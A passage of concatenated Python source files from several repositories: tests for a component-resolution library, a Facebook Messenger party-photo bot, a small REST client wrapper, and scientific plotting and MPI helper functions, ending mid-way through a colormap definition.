Comp.resolve(key="123", sub1_key="13")
# Capture warning
with pytest.warns(None) as record:
Comp.resolve(key="123")
Comp.resolve(key="123", sub1_key=20)
Comp.resolve(key="123", sub2_key=30)
for warning in record:
assert False, f"Warning should not have been given: {warning}"
assert len(record) == 0, "No warning should be given."
def test_subcomponent_conflicting_param_type_shadow_handled_2():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
# type of subcomp key should not be changed because of conflicting names and parent
key: str
def __init__(self, sub: SubComp, key: int):
self.key = key
self.sub1 = sub
with pytest.warns(RuntimeWarning):
Comp.resolve(key=123)
with pytest.warns(RuntimeWarning):
Comp.resolve(key="123", sub_key="456")
# Capture warning
with pytest.warns(None) as record:
Comp.resolve(key="123")
Comp.resolve(key="123", sub_key=20)
for warning in record:
assert False, f"Warning should not have been given: {warning}"
assert len(record) == 0, "No warning should be given."
def test_resolve_conflicting_params():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp, key=4):
self.sub = sub
self.key = key
with pytest.raises(TypeError):
Comp.resolve(other_key=42)
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'key': 5} and c.get_params()['key'] == 4
assert c.sub.key == 5 and c.key == 4
c = Comp.resolve(sub_key=3)
assert c.get_params()['sub'].get_params() == {'key': 3} and c.get_params()['key'] == 4
assert c.sub.key == 3 and c.key == 4
c = Comp.resolve(key=8)
assert c.get_params()['sub'].get_params() == {'key': 5} and c.get_params()['key'] == 8
assert c.sub.key == 5 and c.key == 8
c = Comp.resolve(sub_key=9, key=42)
assert c.get_params()['sub'].get_params() == {'key': 9} and c.get_params()['key'] == 42
assert c.sub.key == 9 and c.key == 42
def test_resolve_conflicting_subcomponent_params_2():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub1: SubComp, sub2: SubComp, key=42):
self.sub1 = sub1
self.sub2 = sub2
self.key = key
with pytest.raises(TypeError):
Comp.resolve(other_key=42)
c = Comp.resolve()
assert c.get_params()['sub1'].get_params() == {'key': 5} and c.get_params()['sub2'].get_params() == {'key': 5} and \
c.get_params()['key'] == 42
assert c.sub1.key == 5 and c.sub2.key == 5 and c.key == 42
c = Comp.resolve(sub1_key=9, sub2_key=12, key=3)
assert c.get_params()['sub1'].get_params() == {'key': 9} and c.get_params()['sub2'].get_params() == {'key': 12} and \
c.get_params()['key'] == 3
assert c.sub1.key == 9 and c.sub2.key == 12 and c.key == 3
def test_attribute_override_from_owner():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
key = 3
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve(key=4)
assert c.get_params()['sub'].get_params() == {'key': 4}
assert c.sub.key == 4
assert type(c.sub) == SubComp
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'key': 3}
assert c.sub.key == 3
c = SubComp()
assert c.get_params() == {'key': 5}
assert c.key == 5
def test_attribute_override_conflict():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
key = 3
sub_key = 9
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.raises(TypeError):
Comp.resolve(key=4)
c = SubComp()
assert c.get_params() == {'key': 5}
assert c.key == 5
with pytest.raises(TypeError):
Comp.resolve()
def test_param_provide_conflict():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve(key=4)
assert c.get_params()['sub'].get_params() == {'key': 4}
assert c.sub.key == 4
assert type(c.sub) == SubComp
c = SubComp()
assert c.get_params() == {'key': 5}
assert c.key == 5
with pytest.raises(TypeError):
Comp.resolve(key=3, sub_key=8)
def test_attribute_override_from_owner_full_name():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
sub_key = 3
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve(key=4)
assert c.get_params()['sub'].get_params() == {'key': 4}
assert c.sub.key == 4
assert type(c.sub) == SubComp
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'key': 3}
assert c.sub.key == 3
c = SubComp()
assert c.get_params() == {'key': 5}
assert c.key == 5
def test_attribute_override_with_owner():
class SubComp(Component):
key = 3
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve(key=4)
assert c.get_params()['sub'].get_params() == {'key': 4}
assert c.sub.key == 4
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'key': 3}
assert c.sub.key == 3
c = SubComp()
assert c.get_params() == {'key': 5}
assert c.key == 5
c = SubComp.resolve()
assert c.get_params() == {'key': 3}
assert c.key == 3
def test_attribute_override_both():
class SubComp(Component):
key = 3
def __init__(self, key=5):
self.key = key
class Comp(Component):
key = 7
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve(key=4)
assert c.get_params()['sub'].get_params() == {'key': 4}
assert c.sub.key == 4
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'key': 7}
assert c.sub.key == 7
c = SubComp()
assert c.get_params() == {'key': 5}
assert c.key == 5
c = SubComp.resolve()
assert c.get_params() == {'key': 3}
assert c.key == 3
def test_component_override():
class SubComp(Component):
def __init__(self, par1=3):
self.par1 = par1
class OtherComp(Component):
def __init__(self, par2=5):
self.par2 = par2
class Comp(Component):
sub: OtherComp
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'par2': 5}
assert type(c.sub) == OtherComp
c = Comp.resolve(par2=8)
assert c.get_params()['sub'].get_params() == {'par2': 8}
assert type(c.sub) == OtherComp
with pytest.raises(TypeError):
Comp.resolve(par1=42)
def test_component_override_parent():
class SubComp(Component):
def __init__(self, par1=3):
self.par1 = par1
class OtherComp(Component):
def __init__(self, par2=5):
self.par2 = par2
class Comp(Component):
def __init__(self, sub: SubComp):
self.sub = sub
class ParentComp(Comp):
sub: OtherComp
c = ParentComp.resolve()
assert c.get_params()['sub'].get_params() == {'par2': 5}
assert type(c.sub) == OtherComp
c = ParentComp.resolve(par2=8)
assert c.get_params()['sub'].get_params() == {'par2': 8}
assert type(c.sub) == OtherComp
with pytest.raises(TypeError):
ParentComp.resolve(par1=42)
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'par1': 3}
assert type(c.sub) == SubComp
c = Comp.resolve(par1=8)
assert c.get_params()['sub'].get_params() == {'par1': 8}
assert type(c.sub) == SubComp
with pytest.raises(TypeError):
Comp.resolve(par2=42)
def test_component_override_subcomponent_type():
class OtherComp(Component):
def __init__(self, par2=5):
self.par2 = par2
class OtherComp2(Component):
def __init__(self, par3=42):
self.par3 = par3
class SubComp(Component):
def __init__(self, sub1: OtherComp, par1=3):
self.sub1 = sub1
self.par1 = par1
class Comp(Component):
sub1: OtherComp2
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve()
assert type(c.sub.sub1) == OtherComp2
c = Comp.resolve(par1=2)
assert c.sub.par1 == 2
with pytest.raises(TypeError):
Comp.resolve(par2=42)
c = Comp.resolve(par3=7)
assert c.sub.sub1.par3 == 7
def test_component_override_subcomponent_type_full_name():
class OtherComp(Component):
def __init__(self, par2=5):
self.par2 = par2
class OtherComp2(Component):
def __init__(self, par3=42):
self.par3 = par3
class SubComp(Component):
def __init__(self, sub1: OtherComp, par1=3):
self.sub1 = sub1
self.par1 = par1
class Comp(Component):
sub_sub1: OtherComp2
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve()
assert type(c.sub.sub1) == OtherComp2
c = Comp.resolve(par1=2)
assert c.sub.par1 == 2
with pytest.raises(TypeError):
Comp.resolve(par2=42)
c = Comp.resolve(par3=7)
assert c.sub.sub1.par3 == 7
def test_parent_component_override_child_type():
class SubComp(Component):
pass
class OtherComp(Component):
pass
class ParentComp(Component):
sub: OtherComp
def __init__(self):
pass
class Comp(ParentComp):
def __init__(self, sub: SubComp):
super().__init__()
self.sub = sub
c = Comp.resolve()
assert type(c.sub) == OtherComp
def test_parent_component_override_child_par():
class SubComp(Component):
def __init__(self, par1 = 42):
self.par1 = par1
class ParentComp(Component):
key = 5
par1 = 9
def __init__(self):
pass
class Comp(ParentComp):
def __init__(self, sub: SubComp, key=3):
super().__init__()
self.key = key
self.sub = sub
c = Comp.resolve()
assert c.key == 5
assert c.sub.par1 == 9
def test_subcomponent_cant_override_owner_type():
class SubComp1(Component):
pass
class SubComp2(Component):
pass
class OtherComp(Component):
par1 = 5
sub: SubComp2
class Comp(Component):
def __init__(self, other: OtherComp, sub: SubComp1, par1=9):
super().__init__()
self.other = other
self.sub = sub
self.par1 = par1
c = Comp.resolve()
assert c.par1 == 9
assert type(c.sub) == SubComp1
def test_cant_change_type_of_non_component_to_component():
class SubComp(Component):
pass
class ParentComp(Component):
def __init__(self, par1: int):
self.par1 = par1
class Comp(ParentComp):
par1: SubComp
with pytest.raises(TypeError):
Comp.resolve()
def test_resolve_component_list():
from typing import Tuple
class SubComp1(Component):
def __init__(self, par=42, par1: int = 3):
self.par = par
self.par1 = par1
class SubComp2(Component):
def __init__(self, par=9, par2: str = "Test"):
self.par = par
self.par2 = par2
class Comp(Component):
def __init__(self, components: Tuple[Component, ...]):
self.components = components
c = Comp.resolve()
assert len(c.components) == 0
class ParentComp(Comp):
components: Tuple[SubComp1, SubComp2]
c = ParentComp.resolve()
assert len(c.components) == 2
assert type(c.components[0]) == SubComp1 and c.components[0].par == 42 and c.components[0].par1 == 3
assert type(c.components[1]) == SubComp2 and c.components[1].par == 9 and c.components[1].par2 == "Test"
c = ParentComp.resolve(par1=5, par2="Hello", components_0_par=1, components_1_par=2)
assert len(c.components) == 2
assert type(c.components[0]) == SubComp1 and c.components[0].par == 1 and c.components[0].par1 == 5
assert type(c.components[1]) == SubComp2 and c.components[1].par == 2 and c.components[1].par2 == "Hello"
with pytest.raises(TypeError):
kwargs = {'0_par': 1}
ParentComp.resolve(**kwargs)
with pytest.raises(TypeError):
ParentComp.resolve(par=5)
def test_dont_override_param_with_function():
class SubComp(Component):
def __init__(self, key=42):
self.key = key
class Comp(Component):
def par(self):
return 3
@property
def key(self):
return 9
def __init__(self, sub: SubComp, par=5):
self.sub = sub
self.par = par
c = Comp.resolve()
assert c.par == 5 and c.sub.key == 42
def test_annotations_subclass_included():
class SubComp(Component):
def __init__(self, key: int):
self.key = key
class Base(Component):
key: str
class Comp(Base):
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.warns(RuntimeWarning):
Comp.resolve(key=3)
with pytest.warns(None) as r:
Comp.resolve(key="3")
assert len(r) == 0
def test_annotations_subsubclass_included():
class SubComp(Component):
def __init__(self, key: int):
self.key = key
class BaseBase(Component):
key: str
class Base(BaseBase):
pass
class Comp(Base):
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.warns(RuntimeWarning):
Comp.resolve(key=3)
with pytest.warns(None) as r:
Comp.resolve(key="3")
assert len(r) == 0
def test_annotations_forward_ref_init():
class Comp(Component):
def __init__(self, sub: 'SubComp'):
self.sub = sub
class SubComp(Component):
def __init__(self, key: int = 3):
self.key = key
# class needs to be defined in globals.
# We simulate this in the function to not hinder other tests:
globals()['SubComp'] = SubComp
c = Comp.resolve()
assert type(c.sub) == SubComp
def test_annotations_forward_ref_attribute():
class SubComp(Component):
def __init__(self, key: int = 3):
self.key = key
class Comp(Component):
sub: 'OtherComp'
def __init__(self, sub: SubComp):
self.sub = sub
class OtherComp(Component):
def __init__(self, key: int = 3):
self.key = key
# class needs to be defined in globals.
# We simulate this in the function to not hinder other tests:
globals()['OtherComp'] = OtherComp
c = Comp.resolve()
assert type(c.sub) == OtherComp
```
#### File: Components/examples/example_app.py
```python
from components import Component
from components.cli import CLI
class LogWriter(Component):
def __init__(self, path: str = "logs/logfile.txt"):
self.path = path
class RotationalLogWriter(LogWriter):
def __init__(self, path: str = "logs/logfile.txt", rotations: int = 5):
super().__init__(path)
self.rotations = rotations
class Application(Component):
def __init__(self, logger: LogWriter, parameter1: int = 42):
self.parameter1 = parameter1
self.logger = logger
def run(self):
print("paramter1:", self.parameter1)
print("logger:", type(self.logger))
print("log path:", self.logger.path)
class CustomApplication(Application):
logger: RotationalLogWriter
parameter1 = 8
def run(self):
super().run()
print("log rotations:", self.logger.rotations)
cli = CLI()
class ApplicationAsCommand(Application, cli.Command):
logger: RotationalLogWriter
def run(self):
super().run()
print("log rotations:", self.logger.rotations)
if __name__ == "__main__":
app = Application.resolve()
print("app.run")
app.run()
custom_app = CustomApplication.resolve()
print("\ncustom_app.run")
custom_app.run()
print("\ncli.run")
cli.run()
``` |
{
"source": "JoeyDP/Party-Post",
"score": 2
} |
#### File: partypost/facebook/chat_profile.py
```python
import json
import requests
from util import *
from ..partybot import PartyBot
PROFILE_URL = "https://graph.facebook.com/me/messenger_profile"
HEADERS = {"Content-Type": "application/json"}
def post(data, accessToken):
jsonData = json.dumps(data)
r = requests.post(PROFILE_URL, params={"access_token": accessToken}, headers=HEADERS, data=jsonData)
if r.status_code != 200:
log("error: {}".format(str(r.status_code)))
log(r.text)
def setup(page):
log("setting up profile")
startButton = getStartedButtonData()
welcome = getWelcomeData()
menu = getMenuData()
data = {**startButton, **welcome, **menu}
log(data)
post(data, page.access_token)
def getStartedButtonData():
data = {
"get_started": {
"payload": json.dumps(PartyBot.sendWelcome())
}
}
return data
def getWelcomeData():
data = {"greeting": [
{
"locale": "default",
"text": "Let's get this party started!"
}
]
}
return data
def getMenuData():
# menu = {
# "locale": "default",
# "composer_input_disabled": False,
# "call_to_actions": [
#
# ],
# }
#
# data = {
# "persistent_menu": [menu]
# }
data = dict()
return data
```
#### File: partypost/facebook/message.py
```python
import json
import requests
from util import *
from partypost import redisCon
MESSAGE_URL = "https://graph.facebook.com/v2.11/me/messages"
HEADERS = {"Content-Type": "application/json"}
class Message:
def __init__(self):
pass
def getData(self):
data = dict()
data["recipient"] = dict()
data["message"] = dict()
return data
def _send(self, recipient, page, isResponse=True):
log("sending message to {}".format(recipient))
data = self.getData()
data["recipient"]["id"] = recipient.id
if isResponse:
data["messaging_type"] = "RESPONSE"
else:
data["messaging_type"] = "NON_PROMOTIONAL_SUBSCRIPTION"
jsonData = json.dumps(data)
log(jsonData)
r = requests.post(MESSAGE_URL, params={"access_token": page.access_token}, headers=HEADERS, data=jsonData)
return r
def send(self, recipient, page, isResponse=True):
r = self._send(recipient, page, isResponse=isResponse)
return self._checkResponse(r)
def _checkResponse(self, r):
if r.status_code != 200:
log(r.status_code)
log(r.text)
return False
return True
class TextMessage(Message):
def __init__(self, text):
super().__init__()
self.text = text
def getData(self):
data = super().getData()
data["message"]["text"] = self.text
return data
class URLAttachmentMessage(Message):
cache = dict()
def __init__(self, url, attachmentType='file', isReusable=True):
super().__init__()
self.url = url
self.attachmentType = attachmentType
self.isReusable = isReusable
self.cache_key = ("fb_attachment_id", self.url, self.attachmentType)
def getData(self):
data = super().getData()
data["message"]["attachment"] = {
'type': self.attachmentType
}
cachedID = redisCon.get(self.cache_key)
if cachedID:
data["message"]["attachment"]["payload"] = {
"attachment_id": cachedID.decode()
}
else:
data["message"]["attachment"]["payload"] = {
"url": self.url
}
if self.isReusable:
data["message"]["attachment"]["payload"]["is_reusable"] = True
return data
# def _send(self, *args, **kwargs):
# r = super()._send(*args, **kwargs)
# if self.isReusable and r.status_code == 200:
# data = r.json()
# attachment_id = data.get('attachment_id')
# if attachment_id:
# redisCon.set(self.cache_key, attachment_id, ex=60*60*24*7) # cache for 1 week
# return r
def _checkResponse(self, r):
if super()._checkResponse(r):
if self.isReusable:
data = r.json()
attachment_id = data.get('attachment_id')
if attachment_id:
redisCon.set(self.cache_key, attachment_id, ex=60 * 60 * 24 * 7) # cache for 1 week
return True
return False
class ImageMessage(URLAttachmentMessage):
def __init__(self, image):
super().__init__(image, attachmentType='image')
class ButtonMessage(Message):
def __init__(self, text, *buttons):
super().__init__()
self.text = text
if len(buttons) > 3:
raise RuntimeError("ButtonMessage can only have 3 options.")
self.buttons = list(buttons)
def getData(self):
data = super().getData()
data["message"] = {
"attachment": {
"type": "template",
"payload": {
"template_type": "button",
"text": self.text,
"buttons": [button.getData() for button in self.buttons]
}
}
}
return data
def addButton(self, text, payload=None, url=None):
if len(self.buttons) == 3:
raise RuntimeError("ButtonMessage can only have 3 options.")
if url is None:
self.buttons.append(Button(text, payload))
elif payload is None:
self.buttons.append(URLButton(text, url))
else:
raise RuntimeError("Both url and payload given for button, pick one.")
class GenericMessage(Message):
def __init__(self):
super().__init__()
self.elements = list()
def getData(self):
data = super().getData()
data["message"] = {
"attachment": {
"type": "template",
"payload": {
"template_type": "generic",
"sharable": False,
"image_aspect_ratio": "square",
"elements": [element.getData() for element in self.elements]
}
}
}
return data
def addElement(self, element):
if len(self.elements) == 10:
raise RuntimeError("GenericMessage can only have 10 elements.")
self.elements.append(element)
class Element:
def __init__(self, title, subtitle, url=None, image=None):
self.title = title
self.subtitle = subtitle
self.url = url
self.image = image
self.buttons = list()
def getData(self):
data = {
"title": self.title,
"subtitle": self.subtitle,
}
if len(self.buttons) > 0:
data["buttons"] = [button.getData() for button in self.buttons]
if self.image:
data["image_url"] = self.image
if self.url:
data["default_action"] = {
"type": "web_url",
"url": self.url,
}
return data
def addButton(self, text, payload=None, url=None):
if len(self.buttons) == 3:
raise RuntimeError("Element can only have 3 options.")
if url is None:
self.buttons.append(Button(text, payload))
elif payload is None:
self.buttons.append(URLButton(text, url))
else:
raise RuntimeError("Both url and payload given for button, pick one.")
class Button:
def __init__(self, text, data):
self.text = text
if type(data) == dict:
self.payload = data
else:
raise RuntimeError("Button payload has unknown type: " + str(type(data)))
def getData(self):
return {
"type": "postback",
"title": self.text,
"payload": json.dumps(self.payload)
}
class URLButton:
def __init__(self, title, url):
self.title = title
self.url = url
def getData(self):
return {
"type": "web_url",
"title": self.title,
"url": self.url,
}
```
#### File: JoeyDP/Party-Post/update.py
```python
import bacli
from partypost.database import Page, Image
from util import log, debug
from RESTfacebook import FacebookAPI
from RESTfacebook.page import Page as FBPage
from RESTapi import RequestException
from tqdm import tqdm
bacli.setDescription("Commands for updating database")
@bacli.command
def run():
""" Runs cleanup followed by crawl. """
log("Started update")
cleanup()
crawl()
log("Finished update")
@bacli.command
def cleanup():
""" Checks for all images whether they still exist on Facebook. Otherwise they are removed. """
log("Running cleanup")
for page in Page.all():
api = FacebookAPI(page.access_token)
for image in page.images:
if image.fb_photo_id:
try:
post = api.getPost(image.fb_photo_id)
log("Image with id {} and url {} still good.".format(image.id, image.url))
except RequestException as e:
data = e.request.json()
if 'error' in data:
error = data['error']
if int(error.get('code', 0)) == 100:
log("Image with id {} and url {} was removed from Facebook.".format(image.id, image.url))
log("Deleting it from the database.")
image.delete()
log("")
@bacli.command
def crawl():
""" Crawls every page for new images that may have been posted. """
log("Running crawl")
for page in Page.all():
api = FacebookAPI(page.access_token)
pageApi = FBPage(api, id=page.id)
photos = pageApi.getPhotos(type='uploaded', fields='images')
for photo in tqdm(photos):
tqdm.write("Processing photo with id {}".format(str(photo.id)), end='\t->\t')
if Image.findByPhotoId(photo.id):
# Note: If chronologically, the loop may be stopped here to increase performance.
tqdm.write("Already present")
else:
tqdm.write("Not in database yet, adding it")
fbImage = _getBestImage(photo.images)
image = Image()
image.sender = None
image.page = page
image.fb_attachment_url = fbImage.source
image.fb_photo_id = photo.id
image.add()
def _getBestImage(images):
return max(images, key=lambda x: x.width * x.height)
``` |
{
"source": "JoeyDP/REST-Client",
"score": 3
} |
#### File: REST-Client/RESTapi/api.py
```python
import sys
from urllib.parse import urljoin
import requests
from .util import decorator
@decorator
def API(cls, base_url):
b = base_url
class A(cls):
base_url = b
suffix = ""
@property
def api(self):
return self
return A
class RequestPage(object):
def __init__(self, response):
self.response = response
@property
def data(self):
return self.response.json()
@property
def items(self):
return self.data.get('data', list())
@property
def itemCount(self):
return None
def getNextUrl(self):
""" Return next url or raise StopIteration if end """
raise NotImplementedError()
class Paginator(object):
def __init__(self, page):
self.page = page
self.itemCount = self.page.itemCount
def fetchNext(self):
response = makeRequest(self.page.getNextUrl())
if not response.ok:
print("Request failed")
print(response.text)
raise StopIteration
self.page = self.page.__class__(response)
def __iter__(self):
while True:
yield self.page
self.fetchNext()
def __len__(self):
return self.itemCount
@decorator
def Entity(cls):
class E(cls):
def __init__(self, api, **data):
self.api = api
# print(data)
for name in dir(cls):
attr = getattr(cls, name)
if isinstance(attr, Property):
try:
value = attr.parse(data.get(name))
except RuntimeError as e:
print("Attribute with name '{}' missing".format(name), file=sys.stderr)
raise e
setattr(self, name, value)
@property
def suffix(self):
return str(self.id) + '/'
@property
def base_url(self):
return self.api.base_url
@property
def token(self):
return self.api.token
return E
def makeRequest(url, *args, **kwargs):
r = requests.get(url, *args, **kwargs)
return r
@decorator
def GET(func, suffix="", paginate=False):
def wrapper(self, *args, **kwargs):
Type = func(self, *args, **kwargs)
the_suffix = suffix
url = urljoin(self.base_url, self.suffix)
url = urljoin(url, the_suffix)
for arg in args:
url = urljoin(url, arg)
params = {key: arg for key, arg in kwargs.items() if arg is not None}
params['access_token'] = self.token
# print(url)
r = makeRequest(url, params=params)
if not r.ok:
print("Request failed")
print("status", str(r.status_code))
print(r.text)
raise RequestException(r)
if paginate:
return self.api.paginate(Type, r)
else:
data = r.json()
entity = Type(self.api, **data)
return entity
return wrapper
def POST(f):
pass
class RequestException(Exception):
def __init__(self, request):
super().__init__()
self.request = request
class Property(object):
def __init__(self, required=True):
self.required = required
def parse(self, value):
if value is None:
if self.required:
raise RuntimeError("Missing required attribute")
else:
return
return self._parse(value)
def _parse(self, value):
raise NotImplementedError("subclasses should implement Property.parse")
class StringProperty(Property):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def _parse(self, value):
return str(value)
class IntProperty(Property):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def _parse(self, value):
return int(value)
# class CompoundProperty(Property):
# def _parse(self, data):
# for name in dir(self.__class__):
# attr = getattr(self.__class__, name)
# if isinstance(attr, Property):
# value = attr.parse(data.get(name))
# setattr(self, name, value)
class ListProperty(Property):
def __init__(self, cls, *args, **kwargs):
super().__init__(*args, **kwargs)
self.cls = cls
def _parse(self, data):
elements = list()
for elem in data:
instance = self.cls()
for name in dir(self.cls):
attr = getattr(self.cls, name)
if isinstance(attr, Property):
value = attr.parse(elem.get(name))
setattr(instance, name, value)
elements.append(instance)
return elements
``` |
{
"source": "JoeyDP/REST-Facebook",
"score": 2
} |
#### File: REST-Facebook/RESTfacebook/page.py
```python
from RESTapi import Entity, GET, StringProperty
from .post import Post
from .photo import Photo
@Entity
class Page(object):
# parameters
id = StringProperty()
name = StringProperty(required=False)
def __str__(self):
return self.name
@GET(suffix="posts/", paginate=True)
def getPosts(self):
return Post
@GET(suffix="photos/", paginate=True)
def getPhotos(self, type=None, fields=None):
""" type can be: uploaded """
return Photo
``` |
{
"source": "joeydumont/python-tools",
"score": 3
} |
#### File: joeydumont/python-tools/vphys.py
```python
def mkdir_p(mypath):
"""
Creates a directory. equivalent to using mkdir -p on the command line
"""
from errno import EEXIST
from os import makedirs,path
try:
makedirs(mypath)
except OSError as exc: # Python >2.5
if exc.errno == EEXIST and path.isdir(mypath):
pass
else: raise
# ---------------------------- Utility Functions ---------------------------- #
def user_mod(value, modulo):
"""
Modulo function that works for both positive and negative "value."
"""
import numpy as np
return value-np.abs(modulo)*np.floor(value/np.abs(modulo))
# ----------------------------- numpy Functions ----------------------------- #
def find_nearest(array,value):
"""
Find the value in an array closest to a specified value. Return the index and
value.
"""
import math
import numpy as np
idx = np.searchsorted(array, value, side="left")
if idx > 0 and (idx == len(array) or math.fabs(value - array[idx-1]) < math.fabs(value - array[idx])):
return idx-1, array[idx-1]
else:
return idx, array[idx]
# --------------------------- matplotlib Functions -------------------------- #
def adjust_spines(ax, spines, points_outward=10):
"""
Helps in re-creating the spartan style of Jean-luc Doumont's graphs.
Removes the spines that are not specified in spines, and colours the specified
ones in gray, and pushes them outside the graph area.
"""
for loc, spine in ax.spines.items():
if loc in spines:
spine.set_position(('outward', points_outward)) # outward by 10 points
#spine.set_smart_bounds(True)
spine.set_color('gray')
else:
spine.set_color('none') # don't draw spine
# turn off ticks where there is no spine
if 'left' in spines:
ax.yaxis.set_ticks_position('left')
else:
# no yaxis ticks
ax.yaxis.set_ticks([])
if 'bottom' in spines:
ax.xaxis.set_ticks_position('bottom')
else:
# no xaxis ticks
ax.xaxis.set_ticks([])
def default_pgf_configuration():
"""
Defines a default configuration for the pgf engine of matplotlib, with
LaTeX support.
"""
pgf_with_pdflatex = {
"font.family": "serif", # use serif/main font for text elements
"text.usetex": True, # use inline math for ticks
"pgf.rcfonts": False, # don't setup fonts from rc parameters
"pgf.preamble": [
r"\usepackage{amsmath}",
#r"\usepackage{mathspec}",
r"\usepackage[charter]{mathdesign}",
r"\usepackage{fontspec}",
#r"\setmathfont{Fira Sans}",
#r"\setmainfont{Oswald}",
r"\usepackage{siunitx}",
r"\sisetup{math-micro=\text{µ},text-micro=µ}"
]
}
return pgf_with_pdflatex
def BarPlotWithLogAxes(ax_handle,x,y,width, xdelta=0.0, **plot_kwargs):
"""
This plots a bar graph with a log-scaled x axis by manually filling rectangles.
We use the
"""
import matplotlib.pyplot as plt
import numpy as np
for i in range(len(x)):
artist, = ax_handle.fill([10**(np.log10(x[i])-width-xdelta), 10**(np.log10(x[i])-width-xdelta), 10**(np.log10(x[i])+width-xdelta),10**(np.log10(x[i])+width-xdelta)], [0, y[i], y[i], 0],**plot_kwargs)
return artist
# ------------------------------ MPI Functions ------------------------------ #
def GenerateIndicesForDifferentProcs(nprocs, loopsize):
"""
Generates a list that contains the elements of the loops that each
rank will process. In the case that the number of processors does not divide
the loop size, We divide the rest of the work amongst the first (loopsize % nprocs)
processors.
"""
rank = MPI.COMM_WORLD.Get_rank()
if (nprocs <= loopsize):
sizes = divmod(loopsize,nprocs)
indices_rank = np.empty((sizes[0]), dtype=int)
for i in range(sizes[0]):
indices_rank[i] = rank*sizes[0]+i
if MPI.COMM_WORLD.Get_rank() < sizes[1]:
indices_rank = np.append(indices_rank, nprocs+MPI.COMM_WORLD.Get_rank())
elif (nprocs > loopsize):
indices_rank = None
if rank < loopsize:
indices_rank = np.array([rank])
return indices_rank
# ------------------------ Cluster-Related Functions ------------------------ #
def ListSimulationDirectories(bin_dir):
"""
We count the number of directory that end in \d{5}.BQ. This gives us the
number of simulation that we ran, and also their names.
"""
import os
import re
dirList = [f for f in os.listdir(bin_dir) if re.search(r'(.*\d{5}.BQ)', f)]
sortedList = sorted(dirList, key=str.lower)
for i in range(len(sortedList)):
sortedList[i] += "/{:05g}.BQ/".format(i+1)
return sortedList
# -------------------------- matplotlib variables --------------------------- #
# -- morgenstemning colormap
# https://www.osapublishing.org/DirectPDFAccess/1A428D10-90A3-7D1F-A46F3712F727F357_252779/oe-21-8-9862.pdf
import matplotlib as mpl
morgen_colors=[[0.0, 0.0, 0.0],
[0.0003007843137254902, 0.004015294117647059, 0.005722352941176471],
[0.0005015686274509805, 0.007930588235294118, 0.011444705882352942],
[0.0007035294117647059, 0.011845882352941177, 0.017168235294117647],
[0.0010047058823529412, 0.015759607843137256, 0.022989411764705883],
[0.0013058823529411765, 0.019576470588235292, 0.028713725490196077],
[0.0016094117647058822, 0.023491764705882354, 0.034534117647058826],
[0.002010980392156863, 0.027404313725490195, 0.04025921568627451],
[0.002412549019607843, 0.031219215686274508, 0.04608196078431372],
[0.0028141176470588237, 0.03503411764705883, 0.051904705882352936],
[0.0032196078431372547, 0.038849019607843135, 0.057727450980392156],
[0.0037215686274509802, 0.04266392156862745, 0.06355019607843138],
[0.004223529411764706, 0.04647411764705882, 0.0693729411764706],
[0.0047305882352941175, 0.05018862745098039, 0.0751956862745098],
[0.005332941176470589, 0.053903137254901964, 0.08102392156862745],
[0.0059352941176470594, 0.05761764705882353, 0.08694705882352942],
[0.006543921568627451, 0.061325882352941175, 0.09287019607843137],
[0.007246666666666667, 0.06494, 0.09879333333333333],
[0.007949411764705882, 0.06854705882352942, 0.1047164705882353],
[0.008659607843137256, 0.07206823529411766, 0.11063960784313726],
[0.009462745098039215, 0.07568235294117646, 0.11656274509803922],
[0.010274117647058822, 0.07928823529411765, 0.12248588235294117],
[0.011177647058823528, 0.08280196078431372, 0.12840901960784315],
[0.012081176470588236, 0.0863156862745098, 0.1343411764705882],
[0.012994117647058823, 0.0898294117647059, 0.14035529411764705],
[0.013998039215686275, 0.09333333333333334, 0.14627843137254903],
[0.015001960784313725, 0.09675686274509804, 0.15221176470588235],
[0.016016470588235295, 0.10025999999999999, 0.15822470588235293],
[0.01712078431372549, 0.1036843137254902, 0.16415882352941177],
[0.01823647058823529, 0.10718666666666667, 0.17017098039215686],
[0.019441176470588233, 0.1106, 0.17609411764705885],
[0.020645882352941177, 0.11401333333333333, 0.18201725490196077],
[0.021850588235294118, 0.11743921568627451, 0.18794039215686273],
[0.023068235294117646, 0.12095294117647058, 0.1938505882352941],
[0.024373333333333334, 0.12446666666666667, 0.19968666666666665],
[0.02567843137254902, 0.12798039215686274, 0.20559607843137254],
[0.02699764705882353, 0.13149411764705882, 0.21143294117647057],
[0.02840313725490196, 0.13499333333333333, 0.217341568627451],
[0.029808627450980393, 0.13840666666666668, 0.2231792156862745],
[0.03122941176470588, 0.14182, 0.22908705882352942],
[0.03275098039215686, 0.14521764705882353, 0.23492549019607842],
[0.03437333333333333, 0.14853058823529414, 0.2408486274509804],
[0.03608, 0.1518435294117647, 0.24677176470588236],
[0.03780352941176471, 0.15513960784313727, 0.25271176470588236],
[0.039627843137254905, 0.1583349019607843, 0.25871803921568626],
